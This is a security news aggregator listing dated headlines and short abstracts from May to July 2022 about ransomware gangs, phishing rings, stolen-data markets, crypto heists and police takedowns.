Holy Ghost ransomware operation linked to North Korean hackers Full Text

Abstract For more than a year, North Korean hackers have been running a ransomware operation called HolyGhost, attacking small businesses in various countries.

BleepingComputer


July 14, 2022

BlackCat Becomes Bolder, Demands $2.5 Million as Ransom Full Text

Abstract The gang has launched several high-profile attacks, including OilTanking GmbH in January and Swissport in February. Most recently, BlackCat targeted Florida International University and the University of North Carolina A&T.

Cyware Alerts - Hacker News


July 13, 2022

Qakbot operations continue to evolve to avoid detection Full Text

Abstract Experts warn that operators behind the Qakbot malware operation are improving their attack chain in an attempt to avoid detection. Qakbot, also known as QBot, QuackBot and Pinkslipbot, is an info-stealing malware that has been active since 2008. The malware...

Security Affairs


July 12, 2022

Luna Moth Group Ransoms Data Without Ransomware Using Remote Administration Tools Full Text

Abstract A little social engineering and commercially available remote administration tools (RATs) and other software are all the new Luna Moth ransom group has needed to infiltrate victims' systems and extort payments.

Dark Reading


July 11, 2022

Ransomware gang now lets you search their stolen data Full Text

Abstract Two ransomware gangs and a data extortion group have adopted a new strategy to force victim companies to pay threat actors to not leak stolen data.

BleepingComputer


July 11, 2022

Update: Hackers Used Fake LinkedIn Job Listing to Steal $625 Million from Axie Infinity Full Text

Abstract Earlier in March this year, Ronin Network (RON), a blockchain network underpinning the famous crypto game Axie Infinity and Axie DAO suffered the largest crypto hack against a decentralized finance network reported to date.

Hackread


July 10, 2022

Hackers Used Fake Job Offer to Hack and Steal $540 Million from Axie Infinity Full Text

Abstract The $540 million hack of Axie Infinity's Ronin Bridge in late March 2022 was the consequence of one of its former employees getting tricked by a fraudulent job offer on LinkedIn, it has emerged. According to a report from The Block published last week citing two people familiar with the matter, a senior engineer at the company was duped into applying for a job at a non-existent company, causing the individual to download a fake offer document disguised as a PDF. "After what one source described as multiple rounds of interviews, a Sky Mavis engineer was offered a job with an extremely generous compensation package," the Block reported. The offer document subsequently acted as a conduit to deploy malware designed to breach Ronin's network, ultimately facilitating one of the crypto sector's biggest hacks to date. "Sky Mavis employees are under constant advanced spear-phishing attacks on various social channels and one employee was compromised," t

The Hacker News


July 8, 2022

As Cybercriminals Recycle Ransomware, They’re Getting Faster Full Text

Abstract The first samples of Nokoyawa ransomware found by FortiGuard researchers were gathered in February 2022 and contain significant coding similarities with Karma, a ransomware that can be traced back to Nemty via a long series of variants.

Security Week


July 8, 2022

Russian Cybercrime Trickbot Group is systematically attacking Ukraine Full Text

Abstract The operators behind the TrickBot malware have been systematically targeting Ukraine since the beginning of the war in February 2022. IBM researchers collected evidence indicating that the Russia-based cybercriminal Trickbot group (aka Wizard Spider, DEV-0193,...

Security Affairs


July 7, 2022

How cyber criminals are targeting Amazon Prime Day shoppers Full Text

Abstract In advance of this year’s Amazon Prime Day set for July 12 and 13, Check Point said it has seen a 37% jump in Amazon-related phishing attacks at the start of July compared with the daily average for June.

Tech Republic


July 06, 2022

Ransomware, hacking groups move from Cobalt Strike to Brute Ratel Full Text

Abstract Hacking groups and ransomware operations are moving away from Cobalt Strike to the newer Brute Ratel post-exploitation toolkit to evade detection by EDR and antivirus solutions.

BleepingComputer


July 5, 2022

Cyber Police of Ukraine arrested 9 men behind phishing attacks on Ukrainians attempting to capitalize on the ongoing conflict Full Text

Abstract The Cyber Police of Ukraine arrested nine members of a cybercriminal gang that has stolen 100 million hryvnias via phishing attacks. The Cyber Police of Ukraine arrested nine members of a cybercriminal organization that stole 100 million hryvnias...

Security Affairs


July 5, 2022

AstraLocker ransomware operators shut down their operations Full Text

Abstract AstraLocker ransomware operators told BleepingComputer they're shutting down their operations and are releasing decryptors. AstraLocker ransomware operators told BleepingComputer they're shutting down the operation and provided decryptors to the VirusTotal...

Security Affairs


July 4, 2022

Data of a billion Chinese residents available for sale on a cybercrime forum Full Text

Abstract Threat actors claim to have breached a database belonging to Shanghai police and stolen the data of a billion Chinese residents. Unknown threat actors claimed to have obtained data of a billion Chinese residents after breaching a database of the Shanghai...

Security Affairs


July 04, 2022

Ukrainian Authorities Arrested Phishing Gang That Stole 100 Million UAH Full Text

Abstract The Cyber Police of Ukraine last week disclosed that it apprehended nine members of a criminal gang that embezzled 100 million hryvnias via hundreds of phishing sites that claimed to offer financial assistance to Ukrainian citizens as part of a campaign aimed at capitalizing on the ongoing conflict. "Criminals created more than 400 phishing links to obtain bank card data of citizens and appropriate money from their accounts," the agency said in a press statement last week. "The perpetrators may face up to 15 years behind bars." The law enforcement operation culminated in the seizure of computer equipment, mobile phones, bank cards as well as the criminal proceeds illicitly obtained through the scheme. Some of the rogue domains registered by the actors included ross0.yolasite[.]com, foundationua[.]com, ua-compensation[.]buzz, www.bless12[.]store, help-compensation[.]xyz, newsukraine10.yolasite[.]com, and euro24dopomoga0.yolasite[.]com, among others. The rogu

The Hacker News


July 03, 2022

HackerOne Employee Caught Stealing Vulnerability Reports for Personal Gains Full Text

Abstract Vulnerability coordination and bug bounty platform HackerOne on Friday disclosed that a former employee at the firm improperly accessed security reports submitted to it for personal gain. "The person anonymously disclosed this vulnerability information outside the HackerOne platform with the goal of claiming additional bounties," it said. "In under 24 hours, we worked quickly to contain the incident by identifying the then-employee and cutting off access to data." The employee, who had access to HackerOne systems between April 4 and June 23, 2022, for triaging vulnerability disclosures associated with different customer programs, has since been terminated by the San Francisco-headquartered company as of June 30. Calling the incident a "clear violation" of its values, culture, policies, and employment contracts, HackerOne said it was alerted to the breach on June 22 by an unnamed customer, which asked it to "investigate a suspicious vulnerabi

The Hacker News


June 30, 2022

Google Blocks Dozens of Malicious Domains Operated by Hack-for-Hire Groups Full Text

Abstract Google's Threat Analysis Group (TAG) on Thursday disclosed it had acted to block as many as 36 malicious domains operated by hack-for-hire groups from India, Russia, and the U.A.E. In a manner analogous to the surveillanceware ecosystem, hack-for-hire firms equip their clients with capabilities to enable targeted attacks aimed at corporates as well as activists, journalists, politicians, and other high-risk users. Where the two stand apart is that while customers purchase the spyware from commercial vendors and then deploy it themselves, the operators behind hack-for-hire attacks are known to conduct the intrusions on their clients' behalf in order to obscure their role. "The hack-for-hire landscape is fluid, both in how the attackers organize themselves and in the wide range of targets they pursue in a single campaign at the behest of disparate clients," Shane Huntley, director of Google TAG, said in a report. "Some hack-for-hire attackers openly adver

The Hacker News


June 29, 2022

RansomHouse gang claims to have stolen 450GB of data from chip maker giant AMD Full Text

Abstract The RansomHouse gang claims to have breached the chipmaker giant AMD and stolen 450 GB of data from the company in 2021. The RansomHouse extortion gang claims to have stolen 450 GB of data from the chipmaker giant AMD in 2021 and threatens to leak...

Security Affairs


June 29, 2022

Ukraine arrests cybercrime gang operating over 400 phishing sites Full Text

Abstract The Ukrainian cyberpolice force arrested nine members of a criminal group that operated over 400 phishing websites crafted to appear like legitimate EU portals offering financial assistance to Ukrainians.

BleepingComputer


June 27, 2022

US, Brazil seize 272 websites used to illegally download music Full Text

Abstract The domains of six websites that streamed and provided illegal downloads of copyrighted music were seized by U.S. Homeland Security Investigations (HSI) and the Department of Justice.

BleepingComputer


June 27, 2022

Threat actors stole $100M in crypto assets from Harmony Full Text

Abstract Threat actors stole $100 million in cryptocurrency from the blockchain company Harmony on Thursday evening. Last week threat actors stole $100 million in cryptocurrency from the blockchain company Harmony. https://twitter.com/vxunderground/status/1540160287009038337 https://twitter.com/peckshield/status/1540215805366964224 The...

Security Affairs


June 26, 2022

Threat actors sell access to tens of vulnerable networks compromised by exploiting Atlassian 0day Full Text

Abstract A threat actor is selling access to 50 vulnerable networks that have been compromised by exploiting the recently disclosed Atlassian Confluence zero-day. A threat actor is selling access to 50 vulnerable networks that have been compromised by exploiting...

Security Affairs


June 24, 2022

The price of stolen info: Everything on sale on the dark web Full Text

Abstract Privacy Affairs researchers concluded criminals using the dark web need only spend $1,115 for a complete set of a person’s account details, enabling them to create fake IDs and forge private documents, such as passports and driver’s licenses.

Help Net Security


June 23, 2022

Crypto Scammers Turn to LinkedIn to Target Victims Full Text

Abstract The scams work in a similar manner as on other platforms. Scammers create professional-looking fake profiles and attempt to strike up conversations with users using the in-built messaging feature.

Cyware Alerts - Hacker News


June 22, 2022

Europol Busts Phishing Gang Responsible for Millions in Losses Full Text

Abstract Europol on Tuesday announced the dismantling of an organized crime group that dabbled in phishing, fraud, scams, and money laundering activities. The cross-border operation, which involved law enforcement authorities from Belgium and the Netherlands, saw the arrests of nine individuals in the Dutch nation. The suspects are men between the ages of 25 and 36 from Amsterdam, Almere, Rotterdam, and Spijkenisse and a 25-year-old woman from Deventer, according to a statement from the National Police Force. Also confiscated as part of 24 house searches were firearms, ammunition, jewelry, designer clothing, expensive watches, electronic devices, tens of thousands of euros in cash, and cryptocurrency, the officials said. "The criminal group contacted victims by email, text message and through mobile messaging applications," the agency noted. "These messages were sent by the members of the gang and contained a phishing link leading to a bogus banking website." Unsu

The Hacker News


June 22, 2022

Crooks are using RIG Exploit Kit to push Dridex instead of Raccoon stealer Full Text

Abstract Threat actors are using the Rig Exploit Kit to spread the Dridex banking trojan instead of the Raccoon Stealer malware. Since January 2022, the Bitdefender Cyber Threat Intelligence Lab observed operators behind the RIG Exploit Kit pushing the Dridex...

Security Affairs


June 21, 2022

Phishing gang behind millions in losses dismantled by police Full Text

Abstract Members of a phishing gang behind millions of euros in losses were arrested today following a law enforcement operation coordinated by Europol.

BleepingComputer


June 21, 2022

Avos Ransomware Group Expands Attack Arsenal to VMware Horizon Access Gateways Full Text

Abstract The initial ingress point was a pair of VMware Horizon Unified Access Gateways that were vulnerable to Log4Shell. The attackers utilized several different tools, including Cobalt Strike, Sliver, and multiple commercial network scanners.

Cisco Talos


June 20, 2022

What do Ransomware Actors Want? Full Text

Abstract The Pain Points: Ransomware Data Disclosure Trends by Rapid7 uncovers the kind of data ransomware actors want and how they pressure victims into getting it back by paying a ransom.

Cyware Alerts - Hacker News


June 20, 2022

New ‘BidenCash’ site sells your stolen credit card for just 15 cents Full Text

Abstract A recently launched carding site called 'BidenCash' is trying to get notoriety by leaking credit card details along with information about their owners.

BleepingComputer


June 17, 2022

Cyberattackers Using MonkeyPox-Themed Attacks to Lure Victims Full Text

Abstract Cybercriminals are using monkeypox outbreaks to fool victims into disclosing their personal information. Monkeypox is high on the news agenda and has people's attention. The email claims that their organization has been monitoring the spread of the disease in the local area, and the updates provide ...

Cyware Alerts - Hacker News


June 16, 2022

BlackCat Ransomware Gang Targeting Unpatched Microsoft Exchange Servers Full Text

Abstract Microsoft is warning that the BlackCat ransomware crew is leveraging exploits for unpatched Exchange server vulnerabilities to gain access to targeted networks. Upon gaining an entry point, the attackers swiftly moved to gather information about the compromised machines, followed by carrying out credential theft and lateral movement activities, before harvesting intellectual property and dropping the ransomware payload. The entire sequence of events played out over the course of two full weeks, the Microsoft 365 Defender Threat Intelligence Team said in a report published this week. "In another incident we observed, we found that a ransomware affiliate gained initial access to the environment via an internet-facing Remote Desktop server using compromised credentials to sign in," the researchers said, pointing out how "no two BlackCat 'lives' or deployments might look the same." BlackCat, also known by the names ALPHV and Noberus, is a relatively n

The Hacker News


June 16, 2022

ALPHV/BlackCat ransomware gang starts publishing victims’ data on the clear web Full Text

Abstract ALPHV/BlackCat ransomware group began publishing victims' data on the clear web to increase the pressure on them and force them to pay the ransom. ALPHV/BlackCat ransomware group has adopted a new strategy to force victims into paying the ransom,...

Security Affairs


June 15, 2022

DragonForce Gang Unleash Hacks Against Govt. of India Full Text

Abstract In response to a comment about the Prophet Mohammed, a hacktivist group in Malaysia has unleashed a wave of cyber attacks in India.

Threatpost


June 15, 2022

Interpol seizes $50 million, arrests 2000 social engineers Full Text

Abstract An international law enforcement operation, codenamed 'First Light 2022,' has seized 50 million dollars and arrested thousands of people involved in social engineering scams worldwide.

BleepingComputer


June 14, 2022

Ransomware gang creates site for employees to search for their stolen data Full Text

Abstract The ALPHV ransomware gang, aka BlackCat, has brought extortion to a new level by creating a dedicated website that allows the customers and employees of their victim to check if their data was stolen in an attack

BleepingComputer


June 14, 2022

Researchers Detail PureCrypter Loader Cyber Criminals Using to Distribute Malware Full Text

Abstract Cybersecurity researchers have detailed the workings of a fully-featured malware loader dubbed PureCrypter that's being purchased by cyber criminals to deliver remote access trojans (RATs) and information stealers. "The loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption, and obfuscation to evade antivirus software products," Zscaler's Romain Dumont said in a new report. Some of the malware families distributed using PureCrypter include Agent Tesla, Arkei, AsyncRAT, AZORult, DarkCrystal RAT (DCRat), LokiBot, NanoCore, RedLine Stealer, Remcos, Snake Keylogger, and Warzone RAT. Sold for a price of $59 by its developer named "PureCoder" for a one-month plan (and $249 for a one-off lifetime purchase) since at least March 2021, PureCrypter is advertised as the "only crypter in the market that uses offline and online delivery technique." Crypters act as the first layer of de

The Hacker News


June 12, 2022

Ransomware gangs are exploiting CVE-2022-26134 RCE in Atlassian Confluence servers Full Text

Abstract Ransomware gangs are actively exploiting CVE-2022-26134 remote code execution (RCE) flaw in Atlassian Confluence Server and Data Center. Multiple ransomware groups are actively exploiting the recently disclosed remote code execution (RCE) vulnerability,...

Security Affairs


June 11, 2022

Microsoft Derails Bohrium Hackers’ Spear-phishing Operation Full Text

Abstract The Microsoft Digital Crimes Unit has dismantled a spear-phishing campaign run by an Iranian threat actor, Bohrium, to target users in the U.S., Middle East, and India. Bohrium actors often create fake social media profiles, often posing as recruiters. The companies need to stay vigilant to keep them ...

Cyware Alerts - Hacker News


June 10, 2022

Researchers Detail How Cyber Criminals Targeting Cryptocurrency Users Full Text

Abstract Cybercriminals are impersonating popular crypto platforms such as Binance, Celo, and Trust Wallet with spoofed emails and fake login pages in an attempt to steal login details and deceptively transfer virtual funds. "As cryptocurrency and non-fungible tokens (NFTs) become more mainstream, and capture headlines for their volatility, there is a greater likelihood of more individuals falling victim to fraud attempting to exploit people for digital currencies," Proofpoint said in a new report. "The rise and proliferation of cryptocurrency has also provided attackers with a new method of financial extraction." The targeting of sensitive cryptocurrency data by threat actors was recently echoed by the Microsoft 365 Defender Research Team, which warned about the emerging threat of cryware wherein private keys, seed phrases, and wallet addresses are plundered with the goal of siphoning virtual currencies by means of fraudulent transfers. The swift popularity of We

The Hacker News


June 10, 2022

Vice Society ransomware gang adds the Italian City of Palermo to its data leak site Full Text

Abstract The Vice Society group has claimed responsibility for the ransomware attack that hit the Italian city of Palermo forcing the IT admins to shut down its infrastructure. The Vice Society ransomware group has claimed responsibility for the recent cyber...

Security Affairs


June 09, 2022

Dark web sites selling alleged Western weapons sent to Ukraine Full Text

Abstract Several weapon marketplaces on the dark web have listed military-grade firearms allegedly coming from Western countries that sent them to support the Ukrainian army in its fight against the Russian invaders.

BleepingComputer


June 8, 2022

US dismantled and seized SSNDOB cybercrime marketplace Full Text

Abstract An international operation led by the US authorities dismantled and seized the infrastructure of the online marketplace SSNDOB. US DoJ announced the seizure of the SSNDOB Marketplace, a series of websites offering personal information, including...

Security Affairs


June 8, 2022

Cuba Ransomware Group’s New Variant Found Using Optimized Infection Techniques Full Text

Abstract While the updates did not change much in terms of overall functionality, researchers believe that it aims to optimize its execution, minimize unintended system behavior, and provide technical support to ransomware victims if they choose to negotiate.

Trend Micro


June 07, 2022

FBI Seizes ‘SSNDOB’ ID Theft Service for Selling Personal Info of 24 Million People Full Text

Abstract An illicit online marketplace known as SSNDOB was taken down in an operation led by U.S. law enforcement agencies, the Department of Justice (DoJ) announced Tuesday. SSNDOB trafficked in personal information such as names, dates of birth, credit card numbers, and Social Security numbers of about 24 million individuals in the U.S., generating its operators $19 million in sales revenue. The action saw the seizure of several domains associated with the marketplace — ssndob.ws, ssndob.vip, ssndob.club, and blackjob.biz — in cooperation with authorities from Cyprus and Latvia. According to blockchain analytics firm Chainalysis, SSNDOB's Bitcoin payment processing system has received nearly $22 million worth of Bitcoin across over 100,000 transactions since April 2015. Furthermore, bitcoin transfers to the tune of more than $100,000 have been unearthed between SSNDOB and Joker's Stash, another darknet market that specialized in stolen credit card information and voluntarily c

The Hacker News


June 07, 2022

US seizes SSNDOB market for selling personal info of 24 million people Full Text

Abstract SSNDOB, an online marketplace that sold the names, social security numbers, and dates of birth of approximately 24 million US people, has been taken offline following an international law enforcement operation.

BleepingComputer


June 07, 2022

Evil Corp Cybercrime Group Shifts to LockBit Ransomware to Evade Sanctions Full Text

Abstract The threat cluster dubbed UNC2165, which shares numerous overlaps with a Russia-based cybercrime group known as Evil Corp, has been linked to multiple LockBit ransomware intrusions in an attempt to get around sanctions imposed by the U.S. Treasury in December 2019. "These actors have shifted away from using exclusive ransomware variants to LockBit — a well-known ransomware as a service (RaaS) — in their operations, likely to hinder attribution efforts in order to evade sanctions," threat intelligence firm Mandiant noted in an analysis last week. Active since 2019, UNC2165 is known to obtain initial access to victim networks via stolen credentials and a JavaScript-based downloader malware called FakeUpdates (aka SocGholish), leveraging it to previously deploy Hades ransomware. Hades is the work of a financially motivated hacking group named Evil Corp, which is also called by the monikers Gold Drake and Indrik Spider and has been attributed to the infamous Dridex

The Hacker News


June 7, 2022

QBot Delivers Black Basta Ransomware Full Text

Abstract NCC Group has reported that the Black Basta ransomware group has formed an alliance with QBot for lateral movement across the target network. Additionally, the attackers were spotted using Cobalt Strike beacons during the compromise. QBot is still propagated via malicious emails, users should stay ...

Cyware Alerts - Hacker News


June 7, 2022

Black Basta ransomware operators leverage QBot for lateral movements Full Text

Abstract The QBot malware operation has partnered with Black Basta ransomware group to target organizations worldwide. Researchers from NCC Group spotted a new partnership in the threat landscape between the Black Basta ransomware group and the QBot malware...

Security Affairs


June 06, 2022

QBot now pushes Black Basta ransomware in bot-powered attacks Full Text

Abstract The Black Basta ransomware gang has partnered with the QBot malware operation to spread laterally through hacked corporate environments.

BleepingComputer


June 6, 2022

Evil Corp Shifts to LockBit to Evade Sanctions Full Text

Abstract In 2019, the U.S. Treasury issued sanctions against 17 individuals and seven entities of Evil Corp cyber operations for causing financial losses of more than $100 million with the Dridex malware. 

Cyware Alerts - Hacker News


June 06, 2022

Ransomware gangs now give victims time to save their reputation Full Text

Abstract Threat analysts have observed an unusual trend in ransomware group tactics, reporting that initial phases of victim extortion are becoming less open to the public as the actors tend to use hidden or anonymous entries.

BleepingComputer


June 6, 2022

Microsoft Shuts Down Bohrium and Polonium Operations Full Text

Abstract Microsoft Digital Crimes Unit (DCU) has successfully dismantled a spear-phishing operation associated with an Iranian threat actor, named Bohrium, that targeted customers in the Middle East, the U.S., and India.

Cyware Alerts - Hacker News


June 6, 2022

AlphaBay Is Taking Over the Dark Web—Again Full Text

Abstract In July 2017, a global law enforcement sting called Operation Bayonet took down AlphaBay’s sprawling marketplace, seizing the site’s central server in Lithuania and arresting its creator, Alexandre Cazes, outside his home in Bangkok.

Wired


June 03, 2022

Microsoft disrupts Bohrium hackers’ spear-phishing operation Full Text

Abstract The Microsoft Digital Crimes Unit (DCU) has disrupted a spear-phishing operation linked to an Iranian threat actor tracked as Bohrium that targeted customers in the U.S., Middle East, and India.

BleepingComputer


June 3, 2022

Access Brokers and Ransomware-as-a-Service Gangs Tighten Relationships Full Text

Abstract Dark web watchers have noted the increasing professionalism of cybercrime groups over the last few years. Criminal groups are well-organized and have just one purpose: streamlining operations to maximize profits.

Security Week


June 3, 2022

Clipminer Botnet Operators Rake in $1.7 Million Through Cryptomining Full Text

Abstract Spreading via trojanized cracked or pirated software, the Clipminer trojan shows similarities with the cryptomining trojan KryptoCibule, suggesting that it could be either a copycat or an evolution of the latter.

Security Week


June 02, 2022

Evil Corp switches to LockBit ransomware to evade sanctions Full Text

Abstract The Evil Corp cybercrime group has now switched to deploying LockBit ransomware on targets' networks to evade sanctions imposed by the U.S. Treasury Department's Office of Foreign Assets Control (OFAC).

BleepingComputer


June 02, 2022

Ransomware gang now hacks corporate websites to show ransom notes Full Text

Abstract A ransomware gang is taking extortion to a new level by publicly hacking corporate websites to publicly display ransom notes.

BleepingComputer


June 02, 2022

Conti Leaks Reveal Ransomware Gang’s Interest in Firmware-based Attacks Full Text

Abstract An analysis of leaked chats from the notorious Conti ransomware group earlier this year has revealed that the syndicate has been working on a set of firmware attack techniques that could offer a path to accessing privileged code on compromised devices. "Control over firmware gives attackers virtually unmatched powers both to directly cause damage and to enable other long-term strategic goals," firmware and hardware security firm Eclypsium said in a report shared with The Hacker News. "Such level of access would allow an adversary to cause irreparable damage to a system or to establish ongoing persistence that is virtually invisible to the operating system." Specifically, this includes attacks aimed at embedded microcontrollers such as the Intel Management Engine (ME), a privileged component that's part of the company's processor chipsets and which can completely bypass the operating system. It's worth noting that the reason for this evolv

The Hacker News


June 2, 2022

An international police operation dismantled FluBot spyware Full Text

Abstract An international law enforcement operation involving 11 countries resulted in the takedown of the FluBot Android malware. An international law enforcement operation involving 11 countries led to the takedown of the infamous FluBot Android malware....

Security Affairs


June 02, 2022

Clipminer malware gang stole $1.7M by hijacking crypto payments Full Text

Abstract Threat analysts have discovered a large operation of a new cryptocurrency mining malware called Clipminer that brought its operators at least $1.7 million from transaction hijacking.

BleepingComputer


June 1, 2022

New Activities by Clop and REvil - Copycats or Final Wrapups? Full Text

Abstract Two prominent ransomware groups, Clop and REvil, had claimed to have shut down but there are some activities that suggest cybercriminals may have not gone completely. Clop had an unexpected return with a jump from the least active threat in March to the fourth most active in April. The so-thought- ...

Cyware Alerts - Hacker News


June 01, 2022

FBI seizes domains used to sell stolen data, DDoS services Full Text

Abstract The Federal Bureau of Investigation (FBI) and the U.S. Department of Justice announced today the seizure of three domains used by cybercriminals to sell personal info stolen in data breaches and to provide DDoS attack services.

BleepingComputer


May 30, 2022

Interpol Nabs 3 Nigerian Scammers Behind Malware-based Attacks Full Text

Abstract Interpol on Monday announced the arrest of three suspected global scammers in Nigeria for using remote access trojans (RATs) such as Agent Tesla to facilitate malware-enabled cyber fraud. "The men are thought to have used the RAT to reroute financial transactions, stealing confidential online connection details from corporate organizations, including oil and gas companies in South East Asia, the Middle East and North Africa," the International Criminal Police Organization said in a statement. One of the scammers in question, named Hendrix Omorume, has been charged and convicted of three counts of financial fraud and has been sentenced to a 12-month prison term. The two other suspects are still on trial. The three Nigerian individuals, who are aged between 31 and 38, have been apprehended for being in possession of fake documents such as fraudulent invoices and forged official letters. The law enforcement said that the suspects systematically used Agent Tesla to breach

The Hacker News


May 30, 2022

Three Nigerian men arrested in INTERPOL Operation Killer Bee Full Text

Abstract Interpol arrested three Nigerian men in Lagos, who are suspected of using the Agent Tesla RAT to reroute financial transactions and steal sensitive data. Interpol arrested 3 Nigerian men in Lagos, as part of an international operation codenamed Killer...

Security Affairs


May 29, 2022

New Yorker imprisoned for role in carding group behind $568M damages Full Text

Abstract John Telusma, a 37-year-old man from New York, was sentenced to four years in prison for selling and using stolen and compromised credit cards on the Infraud carding portal operated by the transnational cybercrime organization with the same name.

BleepingComputer


May 28, 2022

Industrial Spy: Data Extortion Marketplace Ventures into Ransomware Full Text

Abstract MalwareHunterTeam discovered a new malware sample containing a ransom note instead of a promotional text. The note states that the gang has stolen the victim’s data, along with encrypting it.

Cyware Alerts - Hacker News


May 28, 2022

Clop ransomware gang is back, hits 21 victims in a single month Full Text

Abstract After effectively shutting down their entire operation for several months, between November and February, the Clop ransomware is now back according to NCC Group researchers.

BleepingComputer


May 28, 2022

The strange link between Industrial Spy and the Cuba ransomware operation Full Text

Abstract The recently launched Industrial Spy data extortion marketplace has now started its ransomware operation. In April, Malware HunterTeam and Bleeping Computer reported the launch of a new dark web marketplace called Industrial Spy that sells stolen...

Security Affairs


May 27, 2022

Exposed: the threat actors who are poisoning Facebook Full Text

Abstract An investigation of the infamous “Is That You?” video scam has led Cybernews researchers to a cybercriminal stronghold, from which threat actors have been infecting the social media giant with thousands of malicious links every day.

Security Affairs


May 25, 2022

Interpol Arrest Leader of SilverTerrier Cybercrime Gang Behind BEC Attacks Full Text

Abstract A year-long international investigation has resulted in the arrest of the suspected head of the SilverTerrier cybercrime group by the Nigeria Police Force. "The suspect is alleged to have run a transnational cybercrime syndicate that launched mass phishing campaigns and business email compromise schemes targeting companies and individual victims," Interpol said in a statement. Operation Delilah, as the coordinated international effort is called, involved tracking the 37-year-old Nigerian man's physical movements, before he was apprehended at Murtala Mohammed International Airport in Lagos. Singapore-headquartered cybersecurity company Group-IB said it provided threat intelligence that led to the arrest as part of the police operation that commenced in May 2021. The development is the third in a series of law enforcement actions aimed at the identification and arrest of the suspected members of the SilverTerrier gang (aka TMT). In November 2020, three alleged m

The Hacker News


May 25, 2022

Darknet market Versus shuts down after hacker leaks security flaw Full Text

Abstract The Versus Market, one of the most popular English-speaking criminal darknet markets, is shutting down after discovering a severe exploit that could have allowed access to its database and exposed the IP address of its servers.

BleepingComputer


May 25, 2022

International police operation led to the arrest of the SilverTerrier gang leader Full Text

Abstract The Nigeria Police Force has arrested the suspected leader of the SilverTerrier cybercrime group as a result of an international operation. The Nigeria Police Force has arrested the suspected leader of the SilverTerrier cybercrime gang (aka TMT) after...

Security Affairs


May 24, 2022

Conti Ransomware Operation Shut Down After Splitting into Smaller Groups Full Text

Abstract Even as the operators of Conti threatened to overthrow the Costa Rican government, the notorious cybercrime gang officially took down their infrastructure in favor of migrating their criminal activities to other ancillary operations, including Karakurt and BlackByte. "From the negotiations site, chatrooms, messengers to servers and proxy hosts - the Conti brand, not the organization itself, is shutting down," AdvIntel researchers Yelisey Bogusalvskiy and Vitali Kremez said in a report. "However, this does not mean that the threat actors themselves are retiring." The voluntary termination, with the exception of its name-and-shame blog, is said to have occurred on May 19, 2022, while an organizational rejig was happening simultaneously to ensure a smooth transition of the ransomware group's members. AdvIntel said Conti, which is also tracked under the moniker Gold Ulrick, orchestrated its own demise by utilizing information warfare techniques. The disb

The Hacker News


May 24, 2022

Microsoft Warns of Web Skimmers Mimicking Google Analytics and Meta Pixel Code Full Text

Abstract Threat actors behind web skimming campaigns are leveraging malicious JavaScript code that mimics Google Analytics and Meta Pixel scripts in an attempt to sidestep detection. "It's a shift from earlier tactics where attackers conspicuously injected malicious scripts into e-commerce platforms and content management systems (CMSs) via vulnerability exploitation, making this threat highly evasive to traditional security solutions," Microsoft 365 Defender Research Team said in a new report. Skimming attacks, such as those by Magecart, are carried out with the goal of harvesting and exporting users' payment information, such as credit card details, entered into online payment forms in e-commerce platforms, typically during the checkout process. This is achieved by taking advantage of security vulnerabilities in third-party plugins and other tools to inject rogue JavaScript code into the online portals without the owners' knowledge. As skimming attacks have incre

The Hacker News


May 23, 2022

New RansomHouse group sets up extortion market, adds first victims Full Text

Abstract Yet another data-extortion cybercrime operation has appeared on the darknet named 'RansomHouse' where threat actors publish evidence of stolen files and leak data of organizations that refuse to make a ransom payment.

BleepingComputer


May 22, 2022

Chinese “Twisted Panda” Hackers Caught Spying on Russian Defense Institutes Full Text

Abstract At least two research institutes located in Russia and a third likely target in Belarus have been at the receiving end of an espionage attack by a Chinese nation-state advanced persistent threat (APT). The attacks, codenamed "Twisted Panda," come in the backdrop of Russia's military invasion of Ukraine, prompting a wide range of threat actors to swiftly adapt their campaigns on the ongoing conflict to distribute malware and stage opportunistic attacks. They have materialized in the form of social engineering schemes with topical war and sanctions-themed baits orchestrated to trick potential victims into clicking malicious links or opening weaponized documents. Israeli cybersecurity firm Check Point, which disclosed details of the latest intelligence-gathering operation, attributed it to a Chinese threat actor, with connections to that of Stone Panda (aka APT 10, Cicada, or Potassium) and Mustang Panda (aka Bronze President, HoneyMyte, or RedDelta). Callin

The Hacker News


May 21, 2022

New Details About Wizard Spider Emerge Full Text

Abstract First detected in 2017, Wizard Spider has come a long way. A recent investigation by Prodaft revealed that the gang is one of the wealthiest ones and its assets exceed hundreds of millions of dollars.

Cyware Alerts - Hacker News


May 19, 2022

Conti ransomware shuts down operation, rebrands into smaller units Full Text

Abstract The notorious Conti ransomware gang has officially shut down their operation, with infrastructure taken offline and team leaders told that the brand is no more.

BleepingComputer


May 19, 2022

Ransomware gangs rely more on weaponizing vulnerabilities Full Text

Abstract Security researchers are warning that external remote access services continue to be the main vector for ransomware gangs to breach company networks.

BleepingComputer


May 18, 2022

Spanish police dismantle phishing gang that emptied bank accounts Full Text

Abstract The Spanish police have announced the arrest of 13 people and the launch of investigations on another 7 for their participation in a phishing ring that defrauded at least 146 people.

BleepingComputer


May 18, 2022

Researchers Expose Inner Workings of Billion-Dollar Wizard Spider Cybercrime Gang Full Text

Abstract The inner workings of a cybercriminal group known as the Wizard Spider have been exposed, shedding light on its organizational structure and motivations. "Most of Wizard Spider's efforts go into hacking European and U.S. businesses, with a special cracking tool used by some of their attackers to breach high-value targets," Swiss cybersecurity company PRODAFT said in a new report shared with The Hacker News. "Some of the money they get is put back into the project to develop new tools and talent." Wizard Spider, also known as Gold Blackburn, is believed to operate out of Russia and refers to a financially motivated threat actor that's been linked to the TrickBot botnet, a modular malware that was officially discontinued earlier this year in favor of improved malware such as BazarBackdoor. That's not all. The TrickBot operators have also extensively cooperated with Conti, another Russia-linked cybercrime group notorious for offering ransomware-a

The Hacker News


May 18, 2022

US recovers $15 million from global Kovter ad fraud operation Full Text

Abstract The US government has recovered over $15 million from Swiss bank accounts belonging to operators behind the '3ve' online advertising fraud scheme.

BleepingComputer


May 18, 2022

Conti Ransomware gang threatens to overthrow the government of Costa Rica Full Text

Abstract The Conti ransomware gang is threatening to 'overthrow' the new government of Costa Rica after last month's attack. Last month, the Conti ransomware gang claimed responsibility for the attack on Costa Rica government infrastructure after that the government...

Security Affairs


May 18, 2022

Fake crypto sites lure wannabe thieves by spamming login credentials Full Text

Abstract Threat actors are luring potential thieves by spamming login credentials for other people's accounts on fake crypto trading sites, illustrating once again that there is no honor among thieves.

BleepingComputer


May 15, 2022

Ukrainian Hacker Jailed for 4-Years in U.S. for Selling Access to Hacked Servers Full Text

